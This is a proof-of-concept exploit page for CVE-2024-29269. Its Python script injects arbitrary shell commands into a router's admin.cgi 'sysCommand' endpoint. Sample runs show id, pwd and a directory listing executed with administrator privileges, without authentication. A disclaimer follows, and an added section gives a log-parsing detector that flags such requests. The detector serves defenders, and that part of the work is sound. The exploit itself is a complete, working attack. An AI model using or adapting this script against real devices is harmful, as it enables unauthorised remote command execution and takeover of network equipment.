- CVE: CVE-2024-29269
- Severity: Critical
- Details/Reference: https://github.com/wutalent/CVE-2024-29269/blob/main/index.md (archive)
File: script.py
```python
import sys
import requests
import xml.etree.ElementTree as ET


def get_systemutil_response(url, command, proxy):
    # Build the admin.cgi request that carries the command in the Cmd parameter.
    endpoint = f"/cgi-bin/admin.cgi?Command=sysCommand&Cmd={command}"
    full_url = url.rstrip('/') + endpoint
    headers = {
        'Referer': url,
    }
    try:
        response = requests.get(full_url, headers=headers, proxies=proxy)
        if response.status_code == 200:
            print("Response from", full_url)
            #print(response.text)
            # The device answers with XML; the output is in <CmdResult> elements.
            root = ET.fromstring(response.text)
            for cmd_result in root.findall('CmdResult'):
                # An empty <CmdResult/> has text None, so guard before strip().
                data = (cmd_result.text or "").strip()
                print(data)
        else:
            print("Error: Failed to fetch data. Status code:", response.status_code)
    except requests.exceptions.RequestException as e:
        print("Error:", e)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python script.py <url> <command>")
        sys.exit(1)
    url = sys.argv[1]
    command = sys.argv[2]
    # Requests are routed through a local intercepting proxy on port 8080.
    proxy = {
        'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080',
    }
    get_systemutil_response(url, command, proxy)
```

To run the script, use the following commands:
```
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py
Usage: python script.py <url> <command>
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ id
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
uid=0(admin) gid=0(admin)
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ pwd
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd
/etc_ro/lighttpd/www/cgi-bin
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ "ls -al"
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls -al
-rwxrwxr-x    1 1000     1000       xxxxxx web
-rwxrwxr-x    1 1000     1000        xxxxx update.cgi
-rwxrwxr-x    1 1000     1000        xxxxx lte.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportTrafficLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx nms.cgi
-rwxrwxr-x    1 1000     1000        xxxxx admin.cgi
-rwxrwxr-x    1 1000     1000        xxxxx bip.cgi
-rwxrwxr-x    1 1000     1000        xxxxx systemutil.cgi
-rwxrwxr-x    1 1000     1000        xxxxx wireless.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportvpnLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx serialmodem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx modem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx traffic.cgi
-rwxrwxr-x    1 1000     1000        xxxxx firewall.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportSettings.sh
-rwxrwxr-x    1 1000     1000        xxxxx serial.cgi
-rwxrwxr-x    1 1000     1000        xxxxx gmmp.cgi
-rwxrwxr-x    1 1000     1000        xxxxx internet.cgi
-rw-r--r--    1 0        0               0 xx.txt
-rw-r--r--    1 0        0              xx xxyyzz.txt
-rwxrwxrwx    1 0        0         xxxxxxx linux-mips
drwxrwxr-x   21 1000     1000            0 ..
drwxrwxr-x    2 1000     1000            0 .
```
This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.
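
For defenders, the request shape used above (`/cgi-bin/admin.cgi` with `Command=sysCommand` and a `Cmd` value) can be searched for in web access logs. The following detection example is added here and is not part of the original repository; it assumes common/combined log format from the device or from a proxy in front of it, and the function name `find_syscommand_requests` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format (assumed): client IP, timestamp, request line, status.
# The target is matched lazily so a raw, unencoded space in Cmd is still captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>[^"]+?)(?: HTTP/\d\.\d)?" (?P<status>\d{3})'
)


def find_syscommand_requests(lines):
    """Return one dict per logged request to admin.cgi carrying Command=sysCommand."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.lower().endswith("/cgi-bin/admin.cgi"):
            continue
        # parse_qs percent-decodes values; parameter names are compared case-insensitively.
        query = parse_qs(target.query, keep_blank_values=True)
        params = {k.lower(): v for k, v in query.items()}
        if "syscommand" not in (v.lower() for v in params.get("command", [])):
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            "cmd": " ".join(params.get("cmd", [])),  # decoded command string for triage
        })
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2024:10:00:01 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1" 200 98',
    '192.0.2.10 - - [01/Apr/2024:10:00:05 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls%20-al HTTP/1.1" 200 1450',
    '198.51.100.7 - - [01/Apr/2024:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Apr/2024:10:02:30 +0000] "GET /cgi-bin/admin.cgi?Command=other HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in find_syscommand_requests(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} status={hit["status"]} cmd={hit["cmd"]!r}')
```

A hit with status 200 from an address that never authenticated to the management interface is the case to escalate first; the decoded `cmd` field shows what was requested.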

